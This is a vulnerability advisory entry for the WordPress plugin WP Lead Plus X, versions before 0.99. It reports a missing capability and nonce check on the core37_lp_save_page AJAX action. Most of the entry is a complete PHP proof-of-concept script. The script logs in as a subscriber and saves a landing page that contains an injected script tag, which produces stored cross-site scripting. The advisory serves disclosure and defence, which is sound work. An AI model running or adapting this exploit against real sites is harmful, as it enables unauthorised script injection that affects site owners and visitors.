WordPress Plugin Vulnerabilities
WP Lead Plus X < 0.99 - Authenticated Stored Cross-Site Scripting (XSS)
Description
WP Lead Plus X is a WordPress plugin that allows site owners to create custom landing and "squeeze" pages, complete with its own page builder interface capable of inserting custom JavaScript. Unfortunately, this page builder interface also relied on an unprotected AJAX action core37_lp_save_page which lacked a capability check and a nonce check in order to save and update pages.
Proof of Concept
<?php // Settings $url = $argv[1]; //URL of the site $wp_user = $argv[2]; //Subscriber Username $wp_pass = $argv[3]; //Subcriber Password $urlbits = parse_url($url); $wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/'; // Log in as subscriber $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-'); curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-login.php'); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array( 'log' => $wp_user, 'pwd' => $wp_pass, 'wp-submit' => 'Log+In', 'testcookie' => '1' ))); $output = curl_exec($ch); curl_close($ch); //Insert a page with stored XSS $params=array( 'pageContent' => "%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-lp-172110%22%20style%3D%22width%3A%20700px%3B%22%20class%3D%22c37-lp%20c37-step%20ui-sortable%20ui-droppable%22%3E%0A%20%20%20%20%3Csection%20class%3D%22c37-section%20ui-sortable%20ui-droppable%22%20id%3D%22c37-section-643520%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-row%20d-flex%20flex-row%22%20id%3D%22c37-row-326243%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-col-md-12%20c37-col-sm-12%20c37-col-12%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-box-865567%22%20class%3D%22c37-box%20flex-column%20d-flex%20flex-column%20ui-sortable%20ui-droppable%22%3E%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%3Cdiv%20data-original%3D%22false%22%20data-c37-type%3D%22code%22%20class%3D%22c37-lp-element%20c37-item-element%20ui-draggable-handle%22%20id%3D%22c37-code-108583%22%3E%0A%20%20%20%20%3Cdiv%20data-content%3D%22%22%20class%3D%22c37-code-container%22%3E%3Cscript%3Ealert('xss!')%3B%3C%2Fscript%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%0A%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%20%20%20%20%3C%2Fsection%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20", 'pageID' => isset($argv[4]) ? $argv[4] : '0', 'pageSlug'=>'poctest', 'pageTitle' => 'PoCTest', 'pageSettings' => '{"isVariant":false,"isPage":true,"variantPageID":0,"webFonts":[],"modelsJSON":{"c37-section-643520":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","layout":12,"containerClass":"","etype":"section","editingElementID":"c37-section-643520"},"c37-row-326243":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","layout":"12","etype":"row","editingElementID":"c37-row-326243"},"c37-box-865567":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","size":{"desktop":12,"tablet":12,"phone":12},"direction":"flex-column","etype":"box","editingElementID":"c37-box-865567"},"c37-code-108583":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","code":"%3Cscript%3Ealert(\'xss!\')%3B%3C%2Fscript%3E","etype":"code","editingElementID":"c37-code-108583"},"page":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","width":"700","codes":{"trackingCode":"","experimentCode":"","beforeBodyClosing":"","afterBodyOpening":"","metaCode":"","customCSSCode":""},"pageTitle":"PoC","pageSlug":"poc","weight":"1","cssID":"c37-lp-172110","editingElementID":"page","etype":"page"}},"flipCountdown":{},"simpleCountdown":{},"previewURL":"","imageSliders":{},"weight":1,"elementsActions":{},"jsCodes":{},"compiledCSS":""}', 'action' => 'core37_lp_save_page' ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-ajax.php'); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded; charset=UTF-8', 'Connection: close')); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); $output = curl_exec($ch); echo $output; curl_close($ch);
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Ramuel Gall (Wordfence)
Submitter
Ramuel Gall
Verified
No
WPVDB ID
Timeline
Publicly Published
2020-04-07 (about 4 years ago)
Added
2020-04-07 (about 4 years ago)
Last Updated
2021-01-19 (about 3 years ago)